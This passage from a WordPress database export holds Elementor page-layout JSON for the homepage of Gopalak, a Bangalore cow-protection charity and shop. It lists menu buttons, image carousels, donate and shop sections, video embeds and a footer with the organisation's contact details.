mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11977,1985,'_elementor_page_assets','a:0:{}'),(11979,1986,'_elementor_edit_mode','builder'),(11980,1986,'_elementor_template_type','wp-page'),(11981,1986,'_elementor_version','3.7.8'),(11982,1986,'_wp_page_template','elementor_canvas'),(11983,1986,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\"